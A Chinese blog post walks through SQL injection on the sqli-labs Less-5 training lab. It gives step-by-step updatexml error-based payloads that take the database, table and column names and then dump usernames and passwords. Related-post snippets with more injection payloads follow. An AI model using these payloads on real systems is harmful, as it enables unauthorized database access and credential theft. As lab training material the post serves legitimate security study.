SQL注入实例(sqli-labs/less-5)

已于 2024-08-05 22:50:09 修改
阅读量912 收藏
点赞数 37
分类专栏: sql靶场练习 文章标签: sql 数据库
于 2024-08-05 01:57:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thewei666/article/details/140913534
版权

0、初始页面

1、确定闭合字符

?id=1 and 1=1 
?id=1 and 1=2
?id=1'
?id=1' --+

在进行前两句传参时,页面没有发生任何变化,但是当使用单引号闭合时,报错了。通过报错可以确定闭合符号为单引号。

2、爆库名

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

3、爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

4、爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),0x7e),1)--+

5、查询最终目标

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

因为concat有字符长度限制,所以需要substr搭配使用

?id=1' and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),1,32)),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),32,64)),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),64,96)),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),96,128)),0x7e),1) --+

魏大橙
关注
专栏目录
sqli-labs Less-14
qq_42630215的博客
03-28 352
Less-14 POST -Double Injection -Single quotes - String -with twist 与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。 0x01. uname=1&passwd=1&submit=Submit uname=1"&passwd=1&submit=Submit You have ...
SQL注入-08】二次注入案例—以sqli-labs-less24为例
m0_64378913的博客
05-06 1469
1 二次注入概述 1.1 定义 定义:在将数据(一次注入的)存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。 例子:在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。 1.2 思路 (1)黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或
sqli-labs/Less-14
m0_71299382的博客
11-18 186
sqli-labs第十四关
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 301
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
sqli-labs (less-13)
kukudeshuo的博客
03-09 1067
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
SQLI-LABS Less-13 到 Less-14
Web学习之路
03-24 146
联合注入
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 690
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2055
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2631
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
SQLi-LABS Page-1(Basic Challenges)
最新发布
07-24
1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并尝试构造SQL语句。 2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字...
Sqli-labs靶场 Less6
orchid_sea的博客
07-12 430
判断注入类型 双引号注入判断字段数 字段数为3判断数据库版本 版本MYSQL>5 4. 判断数据库的名字 爆破出数据库的名字为 security 5. 判断库中每个表名的长度 第一个表名长度为6 第二个表名长度为8 第三个表名长度为7 第四个表名长度为5 没有第五个表 查询ASCII码对照表,101对应小写的e,即第一个表的第一个字符为 e第一个表的第二个字符为 m 第一个表的第三个字符为 a 。。。 上帝视角,我们直接测试第四个表 第四个表的第一个字符为u 第四个表的第二个字符为s 第四个表的第三个字符
sqlilabs less13~14
TA不懒,但还没有添加简介
07-01 381
sqlilabs less13
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14,SQLi-LABS Less 14,SQLiLABS Less14,SQLi Less 14
Sqlilabs Less-14
Light_inthe_eyes的博客
03-04 153
判断是双引号字符型注入,并且无回显,用报错注入: uname=admin"#&passwd=&submit=Submit 判断列数: uname=admin"+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin"+and+updatexml(1,concat(0x5c,(select+database())),1)#&passwd=&submit=Submit 爆表: uname=admin"+and+u
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 251
sql注入
sqli-labs ————less -14
Fly_鹏程万里
05-11 610
Less-14源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs less13
qq_45106794的博客
10-18 378
#sqli-labs less13 由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。 然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现 所以可以判断字段数为2 接下来试试adm...
sqli-labs/Less-13
m0_71299382的博客
11-18 302
sqli-labs第十三关
sqli labs less 13
Xiaoxiaoqiang_的博客
03-02 156
小学生
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值